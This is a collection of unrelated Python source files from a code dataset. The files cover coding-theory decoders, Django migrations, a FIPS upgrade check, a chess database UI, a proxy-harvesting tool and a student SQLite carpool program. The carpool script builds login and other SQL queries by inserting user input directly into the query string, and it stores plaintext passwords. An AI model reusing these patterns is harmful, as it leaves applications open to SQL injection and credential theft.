" ISD algorithm")
self._algorithm = algorithm
elif algorithm in algorithm_names:
self._algorithm = algorithm_names[algorithm](code, number_errors, **kwargs)
else:
raise ValueError("Unknown ISD algorithm '{}'."
" The known algorithms are {}."\
.format(algorithm, sorted(algorithm_names)))
_known_algorithms = {
"Lee-Brickell": LeeBrickellISDAlgorithm
}
@staticmethod
def known_algorithms(dictionary=False):
r"""
Return the list of ISD algorithms that Sage knows.
Passing any of these to the constructor of
:class:`sage.coding.information_set_decoder.LinearCodeInformationSetDecoder`
will make the ISD decoder use that algorithm.
INPUT:
- ``dictionary`` - optional. If set to ``True``, return a ``dict``
mapping decoding algorithm name to its class.
OUTPUT: a list of strings or a ``dict`` from string to ISD algorithm class.
EXAMPLES::
sage: from sage.coding.information_set_decoder import LinearCodeInformationSetDecoder
sage: sorted(LinearCodeInformationSetDecoder.known_algorithms())
['Lee-Brickell']
"""
if dictionary:
return LinearCodeInformationSetDecoder._known_algorithms
else:
return LinearCodeInformationSetDecoder._known_algorithms.keys()
def algorithm(self):
r"""
Return the ISD algorithm used by this ISD decoder.
EXAMPLES::
sage: C = codes.GolayCode(GF(2))
sage: D = C.decoder("InformationSet", (2,4), "Lee-Brickell")
sage: D.algorithm()
ISD Algorithm (Lee-Brickell) for [24, 12, 8] Extended Golay code over GF(2) decoding between 2 and 4 errors
"""
return self._algorithm
def decode_to_code(self, r):
r"""
Decodes a received word with respect to the associated code of this decoder.
.. WARNING::
If there is no codeword within the decoding radius of this decoder, this
method may never terminate, or it may raise a
:exc:`sage.coding.decoder.DecodingError` exception, depending on the ISD
algorithm used.
INPUT:
- ``r`` -- a vector in the ambient space of :meth:`decoder.Decoder.code`.
OUTPUT: a codeword of :meth:`decoder.Decoder.code`.
EXAMPLES::
sage: M = matrix(GF(2), [[1,0,0,0,0,0,1,0,1,0,1,1,0,0,1],\
[0,1,0,0,0,1,1,1,1,0,0,0,0,1,1],\
[0,0,1,0,0,0,0,1,0,1,1,1,1,1,0],\
[0,0,0,1,0,0,1,0,1,0,0,0,1,1,0],\
[0,0,0,0,1,0,0,0,1,0,1,1,0,1,0]])
sage: C = LinearCode(M)
sage: c = C.random_element()
sage: Chan = channels.StaticErrorRateChannel(C.ambient_space(), 2)
sage: r = Chan(c)
sage: D = C.decoder('InformationSet', 2)
sage: c == D.decode_to_code(r)
True
Information-set decoding a non-binary code::
sage: C = codes.GolayCode(GF(3)); C
[12, 6, 6] Extended Golay code over GF(3)
sage: c = C.random_element()
sage: Chan = channels.StaticErrorRateChannel(C.ambient_space(), 2)
sage: r = Chan(c)
sage: D = C.decoder('InformationSet', 2)
sage: c == D.decode_to_code(r)
True
Let's take a bigger example, for which syndrome decoding or
nearest-neighbor decoding would be infeasible: the `[59, 30]` Quadratic
Residue code over `\GF{3}` has true minimum distance 17, so we can
correct 8 errors::
sage: C = codes.QuadraticResidueCode(59, GF(3))
sage: c = C.random_element()
sage: Chan = channels.StaticErrorRateChannel(C.ambient_space(), 2)
sage: r = Chan(c)
sage: D = C.decoder('InformationSet', 8)
sage: c == D.decode_to_code(r) # long time
True
"""
C = self.code()
if r in C:
return r
return self.algorithm().decode(r)
def decoding_radius(self):
r"""
Return the maximal number of errors this decoder can decode.
EXAMPLES::
sage: C = codes.GolayCode(GF(2))
sage: D = C.decoder("InformationSet", 2)
sage: D.decoding_radius()
2
"""
return self._number_errors[1]
def decoding_interval(self):
r"""
A pair of integers specifying the interval of number of errors this
decoder will attempt to correct.
The interval includes both end values.
EXAMPLES::
sage: C = codes.GolayCode(GF(2))
sage: D = C.decoder("InformationSet", 2)
sage: D.decoding_interval()
(0, 2)
"""
return self._number_errors
def _repr_(self):
r"""
Returns a string representation of this decoding algorithm.
EXAMPLES::
sage: C = codes.GolayCode(GF(2))
sage: D = C.decoder("InformationSet", 2)
sage: D
Information-set decoder (Lee-Brickell) for [24, 12, 8] Extended Golay code over GF(2) decoding up to 2 errors
"""
return "Information-set decoder ({}) for {} decoding {} errors ".format(self.algorithm().name(), self.code(), _format_decoding_interval(self.decoding_interval()))
def _latex_(self):
r"""
Returns a latex representation of this decoding algorithm.
EXAMPLES::
sage: C = codes.GolayCode(GF(2))
sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
sage: D = C.decoder("InformationSet", 2)
sage: latex(D)
\textnormal{Information-set decoder (Lee-Brickell) for }[24, 12, 8] \textnormal{ Extended Golay Code over } \Bold{F}_{2} \textnormal{decoding up to 2 errors}
"""
return "\\textnormal{{Information-set decoder ({}) for }}{} \\textnormal{{decoding {} errors}}".format(self.algorithm().name(), self.code()._latex_(), _format_decoding_interval(self.decoding_interval()))
LinearCodeInformationSetDecoder._decoder_type = {"hard-decision",
"probabilistic", "not-always-closest", "bounded-distance", "might-fail"}
| StarcoderdataPython |
3296400 | # Generated by Django 2.2.1 on 2019-08-05 07:26
from django.db import migrations, models
import stdimage.models
class Migration(migrations.Migration):
dependencies = [
('authentication', '0012_auto_20190709_1304'),
]
operations = [
migrations.AddField(
model_name='team',
name='alibaba_account',
field=models.CharField(blank=True, max_length=20, verbose_name='Alibaba Cloud Account ID'),
),
migrations.AlterField(
model_name='user',
name='icon',
field=stdimage.models.StdImageField(blank=True, null=True, upload_to='icons/'),
),
]
| StarcoderdataPython |
3270798 | """
Copyright 2010 <NAME>, <NAME>, and <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from django import template
register = template.Library()
# Based on http://stackoverflow.com/questions/340888/navigation-in-django/1800535#1800535
@register.tag
def nav_url(parser, token):
'''{% active url %} maps to href="url" and also adds class="url" only if
the current page is the given url. {% active url current %} maps to
href="url" and also adds class="url" if the curent page starts with the
current url.'''
args = token.split_contents()
template_tag = args[0]
if len(args) < 2 or len(args) > 3:
raise template.TemplateSyntaxError, "%r tag requires the url to link to, and an optional path to compare with" % template_tag
return NavSelectedNode(*args[1:])
class NavSelectedNode(template.Node):
def __init__(self, url, current=None):
self.url = url
self.current = current if current else url
def render(self, context):
current_path = context['request'].path
expected_path = template.Variable(self.current).resolve(context)
url = template.Variable(self.url).resolve(context)
if expected_path in ('/', '') and not current_path in ('/', ''):
selected = ""
elif current_path.startswith(expected_path):
selected = ' class="current"'
else:
selected = ""
return 'href="%s"%s' % (url, selected)
| StarcoderdataPython |
50966 | <gh_stars>0
class Solution:
def singleNumber(self, nums: List[int]) -> int:
a = itertools.accumulate(nums,lambda t,x:t^x)
return list(a)[-1]
| StarcoderdataPython |
3321245 | from leapp.actors import Actor
from leapp.exceptions import StopActorExecutionError
from leapp.models import Report, KernelCmdline
from leapp.tags import IPUWorkflowTag, ChecksPhaseTag
from leapp import reporting
class CheckFips(Actor):
"""
Inhibit upgrade if FIPS is detected as enabled.
"""
name = 'check_fips'
consumes = (KernelCmdline,)
produces = (Report,)
tags = (IPUWorkflowTag, ChecksPhaseTag)
def process(self):
cmdline = next(self.consume(KernelCmdline), None)
if not cmdline:
raise StopActorExecutionError('Cannot check FIPS state due to missing command line parameters',
details={'Problem': 'Did not receive a message with kernel command '
'line parameters (KernelCmdline)'})
for parameter in cmdline.parameters:
if parameter.key == 'fips' and parameter.value == '1':
title = 'Cannot upgrade a system with FIPS mode enabled'
summary = 'Leapp has detected that FIPS is enabled on this system. ' \
'In-place upgrade of systems in FIPS mode is currently unsupported.'
reporting.create_report([
reporting.Title(title),
reporting.Summary(summary),
reporting.Severity(reporting.Severity.HIGH),
reporting.Tags([reporting.Tags.SECURITY]),
reporting.Flags([reporting.Flags.INHIBITOR])
])
| StarcoderdataPython |
157034 | <filename>chesstab/gui/gamerow.py
# gamerow.py
# Copyright 2008 <NAME>
# Licence: See LICENCE (BSD licence)
"""Create widgets that display tag roster details of games on database.
"""
import tkinter
from solentware_grid.gui.datarow import (
GRID_COLUMNCONFIGURE,
GRID_CONFIGURE,
WIDGET_CONFIGURE,
WIDGET,
ROW,
)
from pgn_read.core.constants import (
TAG_WHITE,
TAG_BLACK,
TAG_RESULT,
TAG_EVENT,
TAG_DATE,
SEVEN_TAG_ROSTER,
DEFAULT_TAG_VALUE,
DEFAULT_TAG_DATE_VALUE,
DEFAULT_TAG_RESULT_VALUE,
)
from .datarow import DataRow
from ..core.chessrecord import ChessDBrecordGameTags
from .gamedbedit import GameDbEdit
from .gamedbdelete import GameDbDelete
from .gamedbshow import GameDbShow
from . import constants
ON_DISPLAY_COLOUR = "#eba610" # a pale orange
class ChessDBrowGame(ChessDBrecordGameTags, DataRow):
"""Define row in list of games.
Add row methods to the chess game record definition.
"""
header_specification = [
{
WIDGET: tkinter.Label,
WIDGET_CONFIGURE: dict(
text=TAG_WHITE,
anchor=tkinter.W,
padx=0,
pady=1,
font="TkDefaultFont",
),
GRID_CONFIGURE: dict(column=0, sticky=tkinter.EW),
GRID_COLUMNCONFIGURE: dict(weight=1, uniform="player"),
ROW: 0,
},
{
WIDGET: tkinter.Label,
WIDGET_CONFIGURE: dict(
text=TAG_RESULT,
anchor=tkinter.CENTER,
padx=0,
pady=1,
font="TkDefaultFont",
),
GRID_CONFIGURE: dict(column=1, sticky=tkinter.EW),
GRID_COLUMNCONFIGURE: dict(weight=1, uniform="score"),
ROW: 0,
},
{
WIDGET: tkinter.Label,
WIDGET_CONFIGURE: dict(
text=TAG_BLACK,
anchor=tkinter.W,
padx=0,
pady=1,
font="TkDefaultFont",
),
GRID_CONFIGURE: dict(column=2, sticky=tkinter.EW),
GRID_COLUMNCONFIGURE: dict(weight=1, uniform="player"),
ROW: 0,
},
{
WIDGET: tkinter.Label,
WIDGET_CONFIGURE: dict(
text=TAG_EVENT,
anchor=tkinter.W,
padx=0,
pady=1,
font="TkDefaultFont",
),
GRID_CONFIGURE: dict(column=3, sticky=tkinter.EW),
GRID_COLUMNCONFIGURE: dict(weight=1, uniform="event"),
ROW: 0,
},
{
WIDGET: tkinter.Label,
WIDGET_CONFIGURE: dict(
text=TAG_DATE,
anchor=tkinter.W,
padx=0,
pady=1,
font="TkDefaultFont",
),
GRID_CONFIGURE: dict(column=4, sticky=tkinter.EW),
GRID_COLUMNCONFIGURE: dict(weight=1, uniform="date"),
ROW: 0,
},
{
WIDGET: tkinter.Label,
WIDGET_CONFIGURE: dict(
text="Tags",
anchor=tkinter.W,
padx=10,
pady=1,
font="TkDefaultFont",
),
GRID_CONFIGURE: dict(column=5, sticky=tkinter.EW),
GRID_COLUMNCONFIGURE: dict(weight=4, uniform="tags"),
ROW: 0,
},
]
def __init__(self, database=None, ui=None):
"""Extend and associate record definition with database.
database - the open database that is source of row data
ui - the ChessUI instamce
"""
super(ChessDBrowGame, self).__init__()
self.ui = ui
self.set_database(database)
self.row_specification = [
{
WIDGET: tkinter.Label,
WIDGET_CONFIGURE: dict(
anchor=tkinter.W,
font=constants.LISTS_OF_GAMES_FONT,
pady=1,
padx=0,
),
GRID_CONFIGURE: dict(column=0, sticky=tkinter.EW),
ROW: 0,
},
{
WIDGET: tkinter.Label,
WIDGET_CONFIGURE: dict(
anchor=tkinter.CENTER,
font=constants.LISTS_OF_GAMES_FONT,
pady=1,
padx=0,
),
GRID_CONFIGURE: dict(column=1, sticky=tkinter.EW),
ROW: 0,
},
{
WIDGET: tkinter.Label,
WIDGET_CONFIGURE: dict(
anchor=tkinter.W,
font=constants.LISTS_OF_GAMES_FONT,
pady=1,
padx=0,
),
GRID_CONFIGURE: dict(column=2, sticky=tkinter.EW),
ROW: 0,
},
{
WIDGET: tkinter.Label,
WIDGET_CONFIGURE: dict(
anchor=tkinter.W,
font=constants.LISTS_OF_GAMES_FONT,
pady=1,
padx=0,
),
GRID_CONFIGURE: dict(column=3, sticky=tkinter.EW),
ROW: 0,
},
{
WIDGET: tkinter.Label,
WIDGET_CONFIGURE: dict(
anchor=tkinter.W,
font=constants.LISTS_OF_GAMES_FONT,
pady=1,
padx=0,
),
GRID_CONFIGURE: dict(column=4, sticky=tkinter.EW),
ROW: 0,
},
{
WIDGET: tkinter.Label,
WIDGET_CONFIGURE: dict(
anchor=tkinter.W,
font=constants.LISTS_OF_GAMES_FONT,
pady=1,
padx=10,
),
GRID_CONFIGURE: dict(column=5, sticky=tkinter.EW),
ROW: 0,
},
]
def show_row(self, dialog, oldobject):
"""Return a GameDbShow toplevel for instance.
dialog - a Toplevel
oldobject - a ChessDBrecordGame containing original data
"""
return GameDbShow(dialog, oldobject, ui=self.ui)
def delete_row(self, dialog, oldobject):
"""Return a GameDbDelete toplevel for instance.
dialog - a Toplevel
oldobject - a ChessDBrecordGame containing original data
"""
return GameDbDelete(dialog, oldobject, ui=self.ui)
def edit_row(self, dialog, newobject, oldobject, showinitial=True):
"""Return a GameDbEdit toplevel for instance.
dialog - a Toplevel
newobject - a ChessDBrecordGame containing original data to be edited
oldobject - a ChessDBrecordGame containing original data
showintial == True - show both original and edited data
"""
return GameDbEdit(
newobject, dialog, oldobject, showinitial=showinitial, ui=self.ui
)
def grid_row(self, **kargs):
"""Return super(ChessDBrowGame,).grid_row(textitems=(...), **kargs).
Create textitems argument for ChessDBrowGame instance.
"""
tags = self.value.collected_game._tags
return super(ChessDBrowGame, self).grid_row(
textitems=(
tags.get(TAG_WHITE, DEFAULT_TAG_VALUE),
tags.get(TAG_RESULT, DEFAULT_TAG_RESULT_VALUE),
tags.get(TAG_BLACK, DEFAULT_TAG_VALUE),
tags.get(TAG_EVENT, DEFAULT_TAG_VALUE),
tags.get(TAG_DATE, DEFAULT_TAG_DATE_VALUE),
" ".join(
[
"".join((tag, ' "', value, '"'))
for tag, value in self.get_tags_display_order(
self.value
)
]
),
),
**kargs
)
def get_tags_display_order(self, pgn):
str_tags = []
other_tags = []
tags = self.value.collected_game._tags
for t in SEVEN_TAG_ROSTER:
if t not in constants.GRID_HEADER_SEVEN_TAG_ROSTER:
str_tags.append((t, tags.get(t, DEFAULT_TAG_VALUE)))
for t, v in sorted(tags.items()):
if t not in SEVEN_TAG_ROSTER:
other_tags.append((t, v))
return str_tags + other_tags
def set_background_on_display(self, widgets):
self._current_row_background = ON_DISPLAY_COLOUR
self.set_background(widgets, self._current_row_background)
def grid_row_on_display(self, **kargs):
self._current_row_background = ON_DISPLAY_COLOUR
return self.grid_row(background=ON_DISPLAY_COLOUR, **kargs)
def make_ChessDBrowGame(chessui):
"""Make ChessDBrowGame with reference to ChessUI instance"""
def make_position(database=None):
return ChessDBrowGame(database=database, ui=chessui)
return make_position
| StarcoderdataPython |
94631 | from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='Bookmark',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('url', models.URLField()),
],
),
migrations.CreateModel(
name='Note',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
],
),
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tag', models.SlugField()),
('object_id', models.PositiveIntegerField()),
('content_type', models.ForeignKey(on_delete=models.CASCADE, to='contenttypes.ContentType')),
],
),
]
| StarcoderdataPython |
48026 | <gh_stars>0
from Bio import SeqIO # sudo pip install biopython
with open("Danaus.fas", "rU") as handle:
# Example: retain COI
for record in SeqIO.parse(handle, "fasta"):
fields = record.description.split('|')
if fields[2] == 'COI-5P':
print '>' + record.description
print record.seq
| StarcoderdataPython |
1687664 | # Copyright (c) 2013 Shotgun Software Inc.
#
# CONFIDENTIAL AND PROPRIETARY
#
# This work is provided "AS IS" and subject to the Shotgun Pipeline Toolkit
# Source Code License included in this distribution package. See LICENSE.
# By accessing, using, copying or modifying this work you indicate your
# agreement to the Shotgun Pipeline Toolkit Source Code License. All rights
# not expressly granted therein are reserved by Shotgun Software Inc.
# the storage name that is treated to be the primary storage for tank
PRIMARY_STORAGE_NAME = "primary"
# hooks that are used during folder creation.
PROCESS_FOLDER_CREATION_HOOK_NAME = "process_folder_creation"
| StarcoderdataPython |
3243206 | <filename>freehp/commands.py<gh_stars>1-10
# coding=utf-8
import logging
from os.path import isfile
from freehp.errors import UsageError
from freehp import utils
from freehp.version import __version__
from freehp.manager import ProxyManager
from freehp import config
from freehp import squid
log = logging.getLogger(__name__)
class Command:
def __init__(self):
self.config = config.BaseConfig()
self.exitcode = 0
self.settings = self._make_settings()
def _import_settings(self):
pass
def _make_settings(self):
settings = []
classes = self._import_settings()
if classes is not None:
for cls in classes:
if issubclass(cls, config.Setting):
settings.append(cls())
return settings
@property
def name(self):
return ""
@property
def syntax(self):
return ""
@property
def short_desc(self):
return ""
@property
def long_desc(self):
return self.short_desc
def add_arguments(self, parser):
for s in self.settings:
s.add_argument(parser)
def process_arguments(self, args):
for s in self.settings:
v = getattr(args, s.name)
if v is not None:
self.config.set(s.name, v)
def run(self, args):
raise NotImplementedError
class RunCommand(Command):
@property
def name(self):
return "run"
@property
def syntax(self):
return "[OPTIONS]"
@property
def short_desc(self):
return "Run spider to scrap free HTTP proxies"
def _import_settings(self):
return (config.Bind, config.Daemon, config.PidFile,
config.LogLevel, config.LogFile,
config.MinAnonymity, config.CheckerTimeout)
def add_arguments(self, parser):
parser.add_argument('-c', '--config', dest='config', metavar='FILE',
help='configuration file')
super().add_arguments(parser)
parser.add_argument("-s", "--set", dest="set", action="append", default=[], metavar="NAME=VALUE",
help="set/override setting (can be repeated)")
def process_arguments(self, args):
if args.config is not None:
try:
c = utils.load_config(args.config)
except Exception:
raise RuntimeError('Cannot read the configuration file {}'.format(args.config))
for k, v in utils.iter_settings(c):
self.config.set(k, v)
super().process_arguments(args)
try:
self.config.update(dict(x.split("=", 1) for x in args.set))
except ValueError:
raise UsageError("Invalid -s value, use -s NAME=VALUE")
def run(self, args):
cfg = config.Config()
cfg.update(self.config)
if cfg.getbool('daemon'):
utils.be_daemon()
utils.configure_logging('freehp', cfg)
try:
agent = ProxyManager(cfg)
agent.start()
except Exception as e:
log.error(e, exc_info=True)
class SquidCommand(Command):
@property
def name(self):
return "squid"
@property
def syntax(self):
return "[OPTIONS] <DEST_FILE>"
@property
def short_desc(self):
return "Append proxies to the configuration of squid"
def _import_settings(self):
return (squid.AddressSetting, squid.SquidSetting,
config.Daemon, config.MinAnonymity,
squid.MaxNumSetting, squid.HttpsSetting, squid.PostSetting,
squid.UpdateIntervalSetting, squid.TimeoutSetting, squid.OnceSetting,
config.LogLevel, config.LogFile)
def add_arguments(self, parser):
parser.add_argument('dest_file', metavar='FILE', nargs=1,
help='where the squid configuration file is')
parser.add_argument('-t', '--template', dest='template', metavar='FILE',
help='the template of squid configuration, default is the configuration file')
super().add_arguments(parser)
def process_arguments(self, args):
args.dest_file = args.dest_file[0]
if not args.template:
if not isfile(args.dest_file):
raise UsageError('The template of squid configuration is not specified')
args.template = args.dest_file
super().process_arguments(args)
def run(self, args):
cfg = squid.SquidConfig()
cfg.update(self.config)
if cfg.getbool('daemon'):
utils.be_daemon()
utils.configure_logging('freehp', cfg)
try:
s = squid.Squid(args.dest_file, args.template, config=cfg)
s.start()
except Exception as e:
log.error(e, exc_info=True)
class VersionCommand(Command):
@property
def name(self):
return "version"
@property
def short_desc(self):
return "Print the version"
def run(self, args):
print("freehp version {0}".format(__version__))
| StarcoderdataPython |
4820457 | <reponame>ceciliaccwei/CMPUT291-proj1<filename>project.py
import sqlite3
import getpass
import time
import os
import sys
if len(sys.argv) != 2:
print("Please run with: python PROJECT.py DATABASE.db")
quit()
db_file_path = sys.argv[1]
if not (os.path.exists(db_file_path)):
print("File does not exist!")
quit()
conn = sqlite3.connect(db_file_path)
c = conn.cursor()
def main():
conn.commit()
start()
def start():
while True:
print("Welcome to the carpool system!")
print("1. Login")
print("2. Sign up")
print("3. Exit")
command = raw_input("What would you like to do today?")
if command == '1':
login()
elif command == '2':
signup()
continue
elif command == '3':
quit()
else:
print("Command not found!")
def signup():
while True:
email = raw_input("Please enter your email (or BACK): ").lower()
if email == 'back':
main()
c.execute("SELECT * FROM members WHERE email like ?;",(email,))
dup = c.fetchone()
if dup == None:
break
else:
print("This email has already been signed up.")
password = getpass.getpass("Enter your password: ")
name = raw_input("Please enter your name: ")
while True:
try:
phone = int(raw_input("Please enter your phone number: "))
break
except ValueError:
print("Invalid input!")
continue
c.execute("INSERT INTO members VALUES ('%s', '%s', '%s', '%s');" % (email, name, phone, password))
conn.commit()
print("You have successfully signed up!")
main()
def login():
while True:
email = raw_input("Please enter your email (or BACK): ").lower()
if email== 'back':
break
c.execute("SELECT * FROM members WHERE email like '%s';" % email)
username = c.fetchone()
if username == None:
print("Username does not exist")
else:
password = <PASSWORD>("Enter your password: ")
c.execute("SELECT * FROM members WHERE email like '%s' and pwd = '%s';" % (email,password))
check_login = c.fetchone()
if check_login == None:
print("Incorrect email or password, please try again.")
else:
print("Welcome!")
user = email
c.execute("SELECT msgTimestamp,sender,rno,content FROM inbox WHERE email like '%s' and seen like '%s';" % (user,'n'))
print ("".join('%-22s'%x[0] for x in c.description))
ar = [[str(item) for item in results] for results in c.fetchall()]
for row in ar:
print ("".join('%-22s'%x for x in row))
c.execute("UPDATE inbox SET seen = '%s' where seen like '%s' and email like '%s';" % ('y','n',user))
conn.commit()
chooseOptionCategory(user)
break
def chooseOptionCategory(user):
while True:
print("1. Rides")
print("2. Bookings")
print("3. Requests")
print("4. Log out")
print("5. Exit")
option = raw_input("Your option: ")
if option == '1':
RidesRelated(user)
elif option == '2':
BookingsRelated(user)
elif option == '3':
RequestRelated(user)
elif option == '4':
main()
elif option == '5':
quit()
else:
print("Command not found!")
def RidesRelated(user):
while True:
print("1. Offer a ride")
print("2. Search rides")
print("3. Go back")
print("4. Log out")
print("5. Exit")
option = raw_input("Your option: ")
if option == '1':
offerRide(user)
elif option == '2':
searchRides(user)
elif option== '3':
break
elif option=='4':
main()
elif option=='5':
quit()
else:
print("Command not found!")
def BookingsRelated(user):
while True:
print("1. List all confirmed bookings on my rides")
print("2. Book someone on my ride")
print("3. Go back")
print("4. Log out")
print("5. Exit")
option = raw_input("Your option: ")
if option == '1':
bookingList(user)
elif option == '2':
rideList(user)
elif option == '3':
break
elif option == '4':
main()
elif option == '5':
quit()
else:
print("Command not found!")
def rideList(user):
print(user)
c.execute("SELECT r.*, \
r.seats - ifnull(sum(b.seats) ,0) as seats_avaliable \
from rides r \
left join \
bookings b \
on r.rno = b.rno \
where r.driver like ? \
group by r.rno;",(user,))
print ("".join('%-13s'%x[0] for x in c.description))
ar = [[str(item) for item in results] for results in c.fetchall()]
prtFive(ar)
while True:
print("Enter the rno to book")
rno = raw_input("Or enter Back to go back: ")
try:
rno = int(rno)
c.execute("SELECT * FROM rides WHERE driver like '%s' and rno='%d';" % (user,rno))
check_ride = c.fetchone()
if check_ride == None:
print("That's not your ride!")
continue
else:
break
except ValueError:
return
while True:
email = raw_input("Please enter the member's email: ").lower()
c.execute("SELECT * FROM members WHERE email like ?;",(email,))
exist = c.fetchone()
if exist == None:
print("Member does not exist!")
continue
else:
break
c.execute("SELECT r.seats - ifnull(sum(b.seats) ,0) \
from rides r \
left join \
bookings b \
on r.rno = b.rno \
where r.rno = ? \
group by r.rno;",(rno,))
seats_avaliable = int(c.fetchone()[0])
while True:
try:
cost = int(raw_input("Please enter your cost: "))
break
except ValueError:
print("Invalid input!")
continue
while True:
try:
seats = int(raw_input("Please enter your seats booked: "))
break
except ValueError:
print("Invalid input!")
continue
c.execute("SELECT lcode FROM locations")
ar = [[str(item) for item in results] for results in c.fetchall()]
pickup = raw_input("Please enter the pickup loc: ")
while [pickup] not in ar:
searchLoc(pickup)
pickup = raw_input("Please enter the pickup loc: ")
dropoff = raw_input("Please enter the dropoff loc: ")
while [dropoff] not in ar:
searchLoc(dst)
dropoff = raw_input("Please enter your dst: ")
seen = 'n'
c.execute("SELECT ifnull(max(bno),0) FROM bookings")
bno = int(c.fetchone()[0])+1
if seats <= seats_avaliable:
c.execute("INSERT INTO bookings VALUES (?,?,?,?,?,?,?);",(bno,email,rno,cost, int(seats), pickup,dropoff))
content = "your booking: "+str(bno)+ " is confirmed!"
msgTimestamp = time.strftime("%Y-%m-%d %H:%M:%S")
c.execute("INSERT INTO inbox VALUES (?,?,?,?,?,?);",(email,msgTimestamp,user,content,rno,seen))
conn.commit()
print("message sent!")
else:
option = raw_input("Are you sure to overbook? [Y/N]")
if option.upper() == 'Y':
c.execute("INSERT INTO bookings VALUES (?,?,?,?,?,?,?);",(bno,email,rno,cost, int(seats), pickup,dropoff))
content = "your booking: "+str(bno)+ " is confirmed!"
msgTimestamp = time.strftime("%Y-%m-%d %H:%M:%S")
c.execute("INSERT INTO inbox VALUES (?,?,?,?,?,?);",(email,msgTimestamp,user,content,rno,seen))
conn.commit()
print("message sent!")
else:
return
def bookingList(user):
c.execute("SELECT b.* FROM bookings b, rides r\
where b.rno = r.rno and r.driver = ?;",(user,))
print ("".join('%-13s'%x[0] for x in c.description))
ar = [[str(item) for item in results] for results in c.fetchall()]
prtFive(ar)
print("Enter the bno to cancel")
bno = raw_input("Or enter Back to go back: ")
if bno.upper() == 'BACK':
return
else:
bno = int(bno)
c.execute("SELECT email,rno FROM bookings WHERE bno = ?;",(bno,))
temp = c.fetchone()
email = str(temp[0])
rno = int(temp[1])
c.execute("DELETE FROM bookings WHERE bno= ?;", (bno,))
content = "Your booking "+str(bno)+" is cancelled"
seen = 'n'
msgTimestamp = time.strftime("%Y-%m-%d %H:%M:%S")
c.execute("INSERT INTO inbox VALUES (?,?,?,?,?,?);",(email,msgTimestamp,user,content,rno,seen))
conn.commit()
print("Booking cancelled!")
def RequestRelated(user):
while True:
print("1. Post a request")
print("2. List my own requests")
print("3. Search requests")
print("4. Go back")
print("5. Log out")
print("6. Exit")
option = raw_input("Your option: ")
if option == '1':
postRequest(user)
elif option == '2':
myRequest(user)
elif option == '3':
searchRequest(user)
elif option == '4':
break
elif option == '5':
main()
elif option == '6':
quit()
else:
print("Command not found!")
def offerRide(user):
c.execute("SELECT ifnull(max(rno),0) FROM rides")
rno = int(c.fetchone()[0])+1
while True:
try:
price = float(raw_input("Please enter the price: "))
break
except ValueError:
print("Invalid input!")
continue
while True:
rdate = raw_input("Please enter the date in YYYY-MM-DD format: ")
try:
time.strptime(rdate,"%Y-%m-%d")
break
except ValueError:
print("Invalid input!")
continue
while True:
seats = raw_input("Please enter the seats offered: ")
try:
seats = int(seats)
break
except ValueError:
print("Invalid input!")
continue
c.execute("SELECT lcode FROM locations")
ar = [[str(item) for item in results] for results in c.fetchall()]
src = raw_input("Please enter your src: ")
while [src] not in ar:
searchLoc(src)
src = raw_input("Please enter your src: ")
dst = raw_input("Please enter your dst: ")
while [dst] not in ar:
searchLoc(dst)
dst = raw_input("Please enter your dst: ")
lugDesc = raw_input("Please enter the luggage description: ")
while True:
cno = raw_input("Please enter the car number: ")
if cno == '':
cno = None
break
else:
try:
cno = int(cno)
c.execute("SELECT * FROM cars WHERE owner like '%s' and cno ='%d';" % (user,cno))
check_car = c.fetchone()
if check_car == None:
print("That's not your car!")
c.execute("SELECT * from cars where owner like '%s';"%(user,))
print ("".join('%-20s'%x[0] for x in c.description))
ar = [[str(item) for item in results] for results in c.fetchall()]
for row in ar:
print ("".join('%-20s'%x for x in row))
continue
else:
break
except ValueError:
print("Invalid input!")
continue
c.execute("INSERT INTO rides VALUES (?,?,?,?,?,?,?,?,?);",(rno,price,rdate,seats,lugDesc,src,dst,user,cno))
conn.commit()
c.execute("SELECT lcode FROM locations")
ar = [[str(item) for item in results] for results in c.fetchall()]
enroute = raw_input("Please enter the enroute location: ")
while enroute != '':
while [enroute] not in ar:
searchLoc(enroute)
enroute = raw_input("Please enter your enroute location: ")
c.execute("INSERT INTO enroute VALUES (?,?);",(rno,enroute))
enroute = raw_input("Please enter next enroute location: ")
conn.commit()
print("New ride offered!")
def searchRides(user):
keyword1 = raw_input("Keyword1: ")
keyword2 = raw_input("Keyword2: ")
if keyword2 != '':
keyword3 = raw_input("Keyword3: ")
if keyword3 != '':
#search by 3
searchbyK1 = searchKeyword(keyword1)
searchbyK2 = searchKeyword(keyword2)
searchbyK3 = searchKeyword(keyword3)
ar = list((set(tuple(i) for i in searchbyK1)&set(tuple(j) for j in searchbyK2)&set(tuple(k) for k in searchbyK3)))
else:
#search by 2
searchbyK1 = searchKeyword(keyword1)
searchbyK2 = searchKeyword(keyword2)
ar = list((set(tuple(i) for i in searchbyK1)&set(tuple(j) for j in searchbyK2)))
else:
#search by 1
ar = searchKeyword(keyword1)
description = ['rno', 'price', 'rdate', 'seats', 'lugDesc', 'src', 'dst', 'driver', 'cno', 'make', 'model', 'year', 'seats']
print ("".join('%-13s'%x for x in description))
ar = map(list,ar)
ar = sorted(ar, key=lambda x: int(x[0]))
prtFive(ar)
messageDriver(user)
def searchKeyword(keyword):
c.execute("SELECT r.*,c.make,c.model,c.year,c.seats FROM rides r,enroute er,locations l \
left join cars c on r.cno = c.cno \
where (er.lcode = l.lcode and er.rno = r.rno)\
and\
(l.lcode like ? or l.city like ? or l.prov like ? or l.address like ?)\
union \
SELECT DISTINCT r.*,c.make,c.model,c.year,c.seats FROM rides r,locations l1, locations l2\
left join cars c on r.cno = c.cno \
WHERE (r.src = l1.lcode and r.dst =l2.lcode)\
and\
(l1.lcode like ? or l1.city like ? or l1.prov like ? or l1.address like ? or \
l2.lcode like ? or l2.city like ? or l2.prov like ? or l2.address like ? );",
